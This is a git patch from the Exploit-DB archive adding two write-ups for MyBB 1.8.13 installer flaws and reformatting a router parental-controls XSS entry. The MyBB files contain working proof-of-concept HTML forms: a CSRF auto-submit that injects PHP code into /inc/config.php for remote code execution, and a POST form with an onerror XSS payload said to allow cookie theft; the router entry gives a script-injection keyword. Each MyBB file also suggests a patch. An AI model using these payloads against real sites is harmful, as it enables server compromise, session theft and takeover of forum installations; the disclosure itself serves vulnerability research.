From 441b3bdbff95ddb38b70fe383099f83db26e9ce7 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 20 Nov 2017 05:02:09 +0000
Subject: [PATCH] DB: 2017-11-20

2 new exploits

MyBB 1.8.13 - Remote Code Execution
MyBB 1.8.13 - Cross-Site Scripting
---
 files.csv                             |  2 ++
 platforms/hardware/webapps/43150.html | 24 ++++++++------
 platforms/php/webapps/43136.txt       | 32 ++++++++++++++++++
 platforms/php/webapps/43137.txt       | 47 +++++++++++++++++++++++++++
 4 files changed, 95 insertions(+), 10 deletions(-)
 create mode 100644 platforms/php/webapps/43136.txt
 create mode 100644 platforms/php/webapps/43137.txt

diff --git a/files.csv b/files.csv
index 3e2122291..488ec0cc9 100644
--- a/files.csv
+++ b/files.csv
@@ -38843,6 +38843,8 @@ id,file,description,date,author,platform,type,port
 43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
 43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
 43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
+43136,platforms/php/webapps/43136.txt,"MyBB 1.8.13 - Remote Code Execution",2017-11-11,Pabstersac,php,webapps,0
+43137,platforms/php/webapps/43137.txt,"MyBB 1.8.13 - Cross-Site Scripting",2017-11-11,Pabstersac,php,webapps,0
 43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0
 43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0
 43155,platforms/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,php,webapps,0
diff --git a/platforms/hardware/webapps/43150.html b/platforms/hardware/webapps/43150.html
index eaf909812..b42317154 100644
--- a/platforms/hardware/webapps/43150.html
+++ b/platforms/hardware/webapps/43150.html
@@ -6,19 +6,23 @@
 # CVE : CVE-2017-16843
 
 
+
 NewKeyword Parameter:
 
-Login to the router
-Click advanced setup
-Click parental controls
-In the blocked keywords text box enter: test”><script>alert(1)</script> (screenshot 1)
-Click the add keyword button to receive the pop up. 
+1. Login to the router
+2. Click advanced setup
+3. Click parental controls
+4. In the block these keywords text box enter: test”><script>alert(1)</script>
+5. Click the add keyword button to receive the pop up. 
 
-Login to the router
-Click advanced setup
-Click parental controls
-In the block these websites text box enter: test”><script>alert(1)</script> (screenshot 1)
-Click the add domain button to receive the pop up.
+
+NewDomain Parameter:
+
+1. Login to the router
+2. Click advanced setup
+3. Click parental controls
+4. In the block these websites text box enter: test”><script>alert(1)</script>
+5. Click the add domain button to receive the pop up.
 
 Proof of concept code:
 
diff --git a/platforms/php/webapps/43136.txt b/platforms/php/webapps/43136.txt
new file mode 100644
index 000000000..cf42be340
--- /dev/null
+++ b/platforms/php/webapps/43136.txt
@@ -0,0 +1,32 @@
+# Exploit Title: RCE in MyBB up to 1.8.13 via installer
+# Date: Found on 05-29-2017
+# Exploit Author: Pablo Sacristan
+# Vendor Homepage: https://mybb.com/
+# Version: Version > 1.8.13 (Fixed in 1.8.13)
+# CVE : CVE-2017-16780
+
+This RCE can be executed via CSRF but doesn't require it (in some special cases). The requirements are there shouldn't be a lock in the /install/ directory and then if you have access to the install directory you don't need CSRF, but if you don't then you need CSRF. I have included a patch and a description. The exploit will write PHP code to /inc/config.php which is then 'REQUIRE'd in most of the pages in MyBB, the PoC will just write lollol to the top of every page in MyBB. I also have an XSS but that I will report later.
+
+There is a CSRF vulnerability in MyBB /install/index.php which can be used to inject PHP code into /inc/config.php which is then used in most of the pages (require MYBB_ROOT."/inc/config.php" is in most of the pages). 
+  
+The vulnerability exists in the table creation process for sqlite databases, this is because the Database Path is then inserted into the /inc/config.php file in line 11 as $config['database']['database'] = 'DB Path';
+ 
+The vulnerability occurs because MyBB doesn't properly escape the Database Path, allowing an attacker to easily inject PHP by inserting a DB Path of : lol'; echo 'lol     this will not cause any parse errors since there will be a : ';    added at the end. Of course the attacker can easily just execute code in the server, getting backdoor access to the server easily.
+ 
+A PoC would be to host a site like this:
+<form name="x" action="http://localhost/install/index.php" method="post">
+    
+<input type="hidden" name='dbengine' value="sqlite">
+<input type="hidden" name='config[sqlite][dbname]' value="lol'; echo 'lol">
+<input type="hidden" name='config[sqlite][tableprefix]' value="mybb_">
+<input type="hidden" name='action' value="create_tables">
+                                        
+</form>
+ 
+<script>document.x.submit();</script>
+ 
+ 
+And when a victim logged in as admin to a MyBB website visits this site they will have a "lollol" at the top of every page (or you can also make it do much more malicious things).
+ 
+A simple patch would be to change /install/index.php:1410 to:
+if(strstr($config['dbname'], "./") !== false || strstr($config['dbname'], "../") !== false || strstr($config['dbname'], "'") !== false || empty($config['dbname']))
\ No newline at end of file
diff --git a/platforms/php/webapps/43137.txt b/platforms/php/webapps/43137.txt
new file mode 100644
index 000000000..871f1aa10
--- /dev/null
+++ b/platforms/php/webapps/43137.txt
@@ -0,0 +1,47 @@
+# Exploit Title: XSS in MyBB up to 1.8.13 via installer
+# Date: Found on 05-29-2017
+# Exploit Author: Pablo Sacristan
+# Vendor Homepage: https://mybb.com/
+# Version: Version > 1.8.13 (Fixed in 1.8.13)
+# CVE : CVE-2017-16781
+
+No HTML escaping when returning an $error in /install/index.php can
+lead to an XSS which can be used to take over an attacker account.
+
+The vulnerability occurs in /install/index.php:2503 and occurs because
+there is no html encoding of the $error. A simple way to exploit this
+is to create an error by using the Database Server Hostname and
+inserting HTML characters there.
+
+It is a POST XSS and this is a PoC:
+<form name="x" action="http://target.com/install/index.php" method="post">
+
+<input type="hidden" name='dbengine' value="mysqli">
+<input type="hidden" name='config[mysqli][dbhost]' value="<img src=x onerror=alert(0)>">
+<input type="hidden" name='config[mysqli][dbuser]' value="lol">
+<input type="hidden" name='config[mysqli][dbpass]' value="lol">
+<input type="hidden" name='config[mysqli][dbname]' value="lol">
+<input type="hidden" name='config[mysqli][tableprefix]' value="lol">
+<input type="hidden" name='config[mysqli][encoding]' value="utf8">
+<input type="hidden" name='config[mysql][dbhost]' value="localhost">
+<input type="hidden" name='action' value="create_tables">
+
+</form>
+
+<script>document.x.submit();</script>
+
+Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
+
+A simple fix would be to change the function error_list($array) to:
+function error_list($array)
+{
+ $string = "<ul>\n";
+ foreach($array as $error)
+ {
+            $string .= "<li>";
+            $string .= htmlspecialchars($error);
+            $string .= "</li>";
+ }
+ $string .= "</ul>\n";
+ return $string;
+}
\ No newline at end of file